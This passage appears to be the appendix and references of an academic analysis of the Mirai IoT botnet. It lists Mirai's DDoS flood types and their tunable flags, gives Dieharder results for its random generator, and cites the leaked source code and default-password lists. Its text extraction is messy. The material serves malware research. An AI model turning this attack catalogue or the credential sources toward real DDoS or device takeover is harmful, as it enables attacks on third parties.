dhid 9 Domain name transaction ID, default is randomurg 11 Set the URG bit in IP header, default is 0 (no)ack 12 Set the ACK bit in IP header, default is 0 (no) except for ACK floodpsh 13 Set the PSH bit in IP header, default is 0 (no)rst 14 Set the RST bit in IP header, default is 0 (no)syn 15 Set the ACK bit in IP header, default is 0 (no) except for SYN floodfin 16 Set the FIN bit in IP header, default is 0 (no)seqnum 17 Sequence number value in TCP header, default is randomacknum 18 Ack number value in TCP header, default is randomgcip 19 Set internal IP to destination ip, default is 0 (no)method 20 HTTP method name, default is getpostdata 21 POST data, default is empty/nonepath 22 HTTP path, default is /ssl* 23 Use HTTPS/SSLconns 24 Number of connectionssource 25 Source IP address, 255.255.255.255 for random

Table B.3: Attack Flags

* This flag is commented out in the released code and is unused in the given attack list.

CommandName

AttackID

Attack Description Attack Flags Used

udp 0 UDP flood len, rand, tos, ident, ttl, df, sport,dport, source

vse 1 Valve source engine specificflood

tos, ident, ttl, df, sport, dport

dns 2 DNS resolver flood using thetargets domain, input IP isignored

tos, ident, ttl, df, sport, dport,domain, dhid, domain, dhid

syn 3 SYN flood tos, ident, ttl, df, sport, dport,urg, ack, psh, rst, syn, fin, seqnum,acknum, source

ack 4 ACK flood len, rand, tos, ident, ttl, df, sport,dport, urg, ack, psh, rst, syn, fin,seqnum, acknum, source

stomp 5 TCP stomp flood len, rand, tos, ident, ttl, df, dport,urg, ack, psh, rst, syn, fin

greip 6 GRE IP flood len, rand, tos, ident, ttl, df, sport,dport, gcip, source

greeth 7 GRE Ethernet flood len, rand, tos, ident, ttl, df, sport,dport, gcip, source

udpplain 9 UDP flood with less options.optimized for higher PPS

len, rand, dport

http 10 HTTP flood dport, domain, method, postdata,path, conns

Table B.4: Attack Types

B.4 Dieharder Test OutputThe rand_next() random number generator found in Mirai was run through the Dieharder testsuite [38]. A list of 1 billion integers was generated as input (and put into the file rand-out.txt).The following is the results output to the terminal.

#=============================================================================## dieharder version 3.31.1 Copyright 2003 Robert G. Brown ##=============================================================================#

rng_name | filename |rands/second|file_input| rand-out.txt| 4.75e+06 |

#=============================================================================#test_name |ntup| tsamples |psamples| p-value |Assessment

#=============================================================================#diehard_birthdays| 0| 100| 100|0.83609157| PASSED

diehard_operm5| 0| 1000000| 100|0.97382676| PASSEDdiehard_rank_32x32| 0| 40000| 100|0.75902251| PASSED

diehard_rank_6x8| 0| 100000| 100|0.56586170| PASSEDdiehard_bitstream| 0| 2097152| 100|0.83822111| PASSED

diehard_opso| 0| 2097152| 100|0.38470215| PASSEDdiehard_oqso| 0| 2097152| 100|0.88777437| PASSEDdiehard_dna| 0| 2097152| 100|0.66601073| PASSED

diehard_count_1s_str| 0| 256000| 100|0.86113920| PASSEDdiehard_count_1s_byt| 0| 256000| 100|0.93104577| PASSEDdiehard_parking_lot| 0| 12000| 100|0.26814905| PASSED

diehard_2dsphere| 2| 8000| 100|0.97837695| PASSEDdiehard_3dsphere| 3| 4000| 100|0.46256138| PASSED

# The file file_input was rewound 1 timesdiehard_squeeze| 0| 100000| 100|0.30910275| PASSED

# The file file_input was rewound 1 timesdiehard_sums| 0| 100| 100|0.00356192| WEAK

# The file file_input was rewound 1 times

diehard_runs| 0| 100000| 100|0.63303029| PASSEDdiehard_runs| 0| 100000| 100|0.29425160| PASSED

# The file file_input was rewound 1 timesdiehard_craps| 0| 200000| 100|0.31877746| PASSEDdiehard_craps| 0| 200000| 100|0.29224712| PASSED

# The file file_input was rewound 3 timesmarsaglia_tsang_gcd| 0| 10000000| 100|0.12407971| PASSEDmarsaglia_tsang_gcd| 0| 10000000| 100|0.54303713| PASSED

# The file file_input was rewound 3 timessts_monobit| 1| 100000| 100|0.98998524| PASSED

# The file file_input was rewound 3 timessts_runs| 2| 100000| 100|0.87578329| PASSED

# The file file_input was rewound 3 timessts_serial| 1| 100000| 100|0.95060384| PASSEDsts_serial| 2| 100000| 100|0.28310247| PASSEDsts_serial| 3| 100000| 100|0.87366236| PASSEDsts_serial| 3| 100000| 100|0.24227053| PASSEDsts_serial| 4| 100000| 100|0.65691819| PASSEDsts_serial| 4| 100000| 100|0.61810062| PASSEDsts_serial| 5| 100000| 100|0.64222478| PASSEDsts_serial| 5| 100000| 100|0.73623440| PASSEDsts_serial| 6| 100000| 100|0.41945001| PASSEDsts_serial| 6| 100000| 100|0.76379319| PASSEDsts_serial| 7| 100000| 100|0.34143872| PASSEDsts_serial| 7| 100000| 100|0.51791054| PASSEDsts_serial| 8| 100000| 100|0.27491889| PASSEDsts_serial| 8| 100000| 100|0.53411066| PASSEDsts_serial| 9| 100000| 100|0.04460440| PASSEDsts_serial| 9| 100000| 100|0.67477287| PASSEDsts_serial| 10| 100000| 100|0.75382504| PASSEDsts_serial| 10| 100000| 100|0.30917173| PASSEDsts_serial| 11| 100000| 100|0.70596790| PASSEDsts_serial| 11| 100000| 100|0.68132011| PASSEDsts_serial| 12| 100000| 100|0.89889121| PASSEDsts_serial| 12| 100000| 100|0.25224630| PASSEDsts_serial| 13| 100000| 100|0.90279437| PASSEDsts_serial| 13| 100000| 100|0.78279920| PASSEDsts_serial| 14| 100000| 100|0.59854454| PASSEDsts_serial| 14| 100000| 100|0.23992835| PASSEDsts_serial| 15| 100000| 100|0.80303002| PASSEDsts_serial| 15| 100000| 100|0.49221848| PASSED

sts_serial| 16| 100000| 100|0.21368050| PASSEDsts_serial| 16| 100000| 100|0.06374385| PASSED

# The file file_input was rewound 3 timesrgb_bitdist| 1| 100000| 100|0.82129508| PASSED












# The file file_input was rewound 4 timesrgb_minimum_distance| 2| 10000| 1000|0.83797165| PASSED# The file file_input was rewound 4 timesrgb_minimum_distance| 3| 10000| 1000|0.54332203| PASSED# The file file_input was rewound 4 timesrgb_minimum_distance| 4| 10000| 1000|0.91763093| PASSED# The file file_input was rewound 4 timesrgb_minimum_distance| 5| 10000| 1000|0.09081409| PASSED# The file file_input was rewound 5 times

rgb_permutations| 2| 100000| 100|0.72550434| PASSED# The file file_input was rewound 5 times




rgb_lagged_sum| 0| 1000000| 100|0.23944443| PASSED# The file file_input was rewound 5 times
















rgb_lagged_sum| 16| 1000000| 100|0.99926753| WEAK# The file file_input was rewound 22 times



rgb_lagged_sum| 19| 1000000| 100|0.79273460| PASSED

# The file file_input was rewound 28 timesrgb_lagged_sum| 20| 1000000| 100|0.67312082| PASSED







# The file file_input was rewound 45 timesrgb_lagged_sum| 27| 1000000| 100|0.99598155| WEAK






# The file file_input was rewound 61 timesrgb_kstest_test| 0| 10000| 1000|0.47483945| PASSED

# The file file_input was rewound 61 timesdab_bytedistrib| 0| 51200000| 1|0.33010460| PASSED

# The file file_input was rewound 61 timesdab_dct| 256| 50000| 1|0.70630354| PASSED

Preparing to run test 207. ntuple = 0# The file file_input was rewound 61 times

dab_filltree| 32| 15000000| 1|0.53420292| PASSEDdab_filltree| 32| 15000000| 1|0.31348870| PASSED

Preparing to run test 208. ntuple = 0# The file file_input was rewound 61 times

dab_filltree2| 0| 5000000| 1|0.15174195| PASSEDdab_filltree2| 1| 5000000| 1|0.47669851| PASSED

Preparing to run test 209. ntuple = 0

# The file file_input was rewound 61 timesdab_monobit2| 12| 65000000| 1|0.97843053| PASSED

Bibliography

[1] Council, N. (2008) “Six technologies with potential impacts on us interests out to 2025,”Disruptive Civil Technologies 2008.

[2] Soper, T. (2016), “Amazon Echo sales reach 5M in two years, research firm says, as Googlecompetitor enters market,” web, http://www.geekwire.com/2016/amazon-echo-sales-reach-5m-two-years-research-firm-says-google-competitor-enters-market/.

[3] Sun, L. (2016), “Connected Cars in the Next Decade: 4 Numbers Everyone Should Know,”web, http://www.fool.com/investing/general/2016/03/06/connected-cars-in-the-next-decade-4-numbers-everyo.aspx.

[4] Columbus, L. (2016), “Roundup Of Internet Of Things Forecasts And Market Estimates,2016,” web, http://www.forbes.com/sites/louiscolumbus/2016/11/27/roundup-of-internet-of-things-forecasts-and-market-estimates-2016/.

[5] (2015), “Gartner Says 6.4 Billion Connected "Things" Will Be in Use in 2016, Up 30 PercentFrom 2015,” web, https://www.gartner.com/newsroom/id/3165317.

[6] Krebs, B. (2016), “KrebsOnSecurity Hit With Record DDoS,” web,https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/.

[7] Https://github.com/jgamblin/Mirai-Source-Code.

[8] York, K. (2016), “Dyn Statement on 10/21/2016 DDoS Attack,” web,https://dyn.com/blog/dyn-statement-on-10212016-ddos-attack/.

[9] Hwang, Y. (2017), “The Hajime Worm â�� Is it the Solution to Mirai or the Next-GenBotnet?” web, https://iot-for-all.com/hajime-worm-solution-mirai-next-gen-botnet/.

[10] for Disease Control, C. (2016), “About Parasites,” web,https://www.cdc.gov/parasites/about.html.

[11] “What Is the Di�erence: Viruses, Worms, Trojans, and Bots?” web,https://www.cisco.com/c/en/us/about/security-center/virus-di�erences.html.

[12] Orman, H. (2003) “The Morris worm: A fifteen-year perspective,” IEEE Security & Privacy,99(5), pp. 35–43.

[13] Seltzer, L. (2010), “’I Love You’ Virus Turns Ten: What Have We Learned?” web,http://www.pcmag.com/article2/0,2817,2363172,00.asp.

[14] Staniford, S., V. Paxson, N. Weaver, et al. (2002) “How to 0wn the Internet in YourSpare Time.” in USENIX Security Symposium, vol. 2, pp. 14–15.

65

[15] Zou, C. C., W. Gong, and D. Towsley (2002) “Code red worm propagation modelingand analysis,” in Proceedings of the 9th ACM conference on Computer and communications

security, ACM, pp. 138–147.

[16] Moore, D., V. Paxson, S. Savage, C. Shannon, S. Staniford, and N. Weaver (2003)“Inside the Slammer worm,” IEEE Security Privacy, 1(4), pp. 33–39.

[17] Holz, T., M. Steiner, and F. Dahl (2008) “Measurements and mitigation of Peer-to-Peer-based Botnets: A case study on storm worm,” in Proceeding of the First USENIX Workshop

0n Large-Scale Exploits and Emergent Threats (LEET’08).

[18] Stone-Gross, B., M. Cova, L. Cavallaro, B. Gilbert, M. Szydlowski, R. Kem-merer, C. Kruegel, and G. Vigna (2009) “Your botnet is my botnet: analysis of a botnettakeover,” in Proceedings of the 16th ACM conference on Computer and communications

security, ACM, pp. 635–647.

[19] Kelley, M. B. (2013) “The Stuxnet attack on Iranâ�ès nuclear plant was â�Ÿfar moredangerousâ�è than previously thought,” Business Insider, 20.

[20] “Linux.Darlloz,” web, https://www.symantec.com/security_response/writeup.jsp.

[21] Kovacs, E. (2014), “BASHLITE Malware Uses ShellShock to Hijack Devices Running Busy-Box,” web, http://www.securityweek.com/bashlite-malware-uses-shellshock-hijack-devices-running-busybox.

[22] Silva, S. S., R. M. Silva, R. C. Pinto, and R. M. Salles (2013) “Botnets: A survey,”Computer Networks, 57(2), pp. 378–403.

[23] Kalt, C. (2000), “Internet Relay Chat: Client Protocol,” web,https://tools.ietf.org/html/rfc2812.

[24] “BOOTERS, STRESSERS AND DDOSERS,” web, https://www.incapsula.com/ddos/booters-stressers-ddosers.html.

[25] Francis, R. (2017), “Hire a DDoS service to take down your enemies,”web, http://www.csoonline.com/article/3180246/data-protection/hire-a-ddos-service-to-take-down-your-enemies.html.

[26] Kan, M. (2016), “Dozens arrested in international DDoS-for-hire crackdown,”web, http://www.pcworld.com/article/3149543/security/dozens-arrested-in-international-ddos-for-hire-crackdown.html.

[27] Kassner, M. (2010), “The top 10 spam botnets: New and improved,” web,http://www.techrepublic.com/blog/10-things/the-top-10-spam-botnets-new-and-improved/.

[28] Krebs, B. (2016), “Source Code for IoT Botnet ’Mirai’ Released,” web,https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/.

[29] ——— (2017) “Who is Anna-Senpai, the Mirai Worm Author?” Krebs on Security.

[30] Zeifman, I., D. Bekerman, and B. Herzberg (2016) “Breaking Down Mirai: An IoT DDoSBotnet Analysis,” Imperva. Source: https://www. incapsula. com/blog/malware-analysis-

mirai-ddos-botnet. html.

[31] Krebs, B. (2016), “Who Makes the IoT Things Under Attack?” .

[32] “BusyBox Command Help,” web, https://busybox.net/downloads/BusyBox.html.

[33] Nixon, A. and P. Lamy (2016), “Mirai and IoT: Understanding DDoS Impact Means Accu-rately Analyzing the Past,” web, https://www.flashpoint-intel.com/blog/cybercrime/mirai-iot-understanding-ddos-impact/.

[34] “New IoT Malware? Anime/Kami,” web, https://evosec.eu/new-iot-malware/.

[35] “fd_set(3) - Linux man page,” web, https://linux.die.net/man/3/fd_set.

[36] Kincaid, J. (2009), “Google’s Go: A New Programming Language That’s Python MeetsC++,” web, https://techcrunch.com/2009/11/10/google-go-language/.

[37] “The Go Programming Language - Package net,” web, https://golang.org/pkg/net/.

[38] Brown, R. G., “Dieharder: A Random Number Test Suite,” web,http://www.phy.duke.edu/ rgb/General/dieharder.php.

[39] Yao, A. C. (1982) “Theory and application of trapdoor functions,” in Foundations of

Computer Science, 1982. SFCS’08. 23rd Annual Symposium on, IEEE, pp. 80–91.

[40] Baig, A. (2017), “Top 5 Countries Where Cyber Attacks Originate,” web,https://securitytoday.com/Articles/2017/03/03/Top-5-Countries-Where-Cyber-Attacks-Originate.aspx.

[41] “Qbot,” web, https://github.com/geniosa/qbot.

[42] Ace, E. (2016), “IP Cameras Default Passwords Directory,” web,https://ipvm.com/reports/ip-cameras-default-passwords-directory.

[43] the Public Knows About Cybersecurity, W. (2017), “Kenneth Olmstead andAaron Smith,” web, http://www.pewinternet.org/2017/03/22/what-the-public-knows-about-cybersecurity/.

[44] Fair, L. (2017), “D-Link case alleges inadequate Internet of Things security prac-tices,” web, https://www.ftc.gov/news-events/blogs/business-blog/2017/01/d-link-case-alleges-inadequate-internet-things-security.

[45] “Go by Example: Channels,” web, https://gobyexample.com/channels.

[46] Fisher, T. (2017), “Cisco Default Password List,” web, https://www.lifewire.com/cisco-default-password-list-2619151.

[47] “HiSilicon IP camera root passwords,” web, https://gist.github.com/gabonator/74cdd6ab4f733�047356198c781f27d.

[48] “SMC ROUTER Default Login, Password and IP,” web, http://www.cleancss.com/router-default/SMC/ROUTER.

[49] “The common router ID and password Daquan,” web,http://www.programmershare.com/308830/.

tracking mirai: an in-depth analysis of an iot botnet

Documents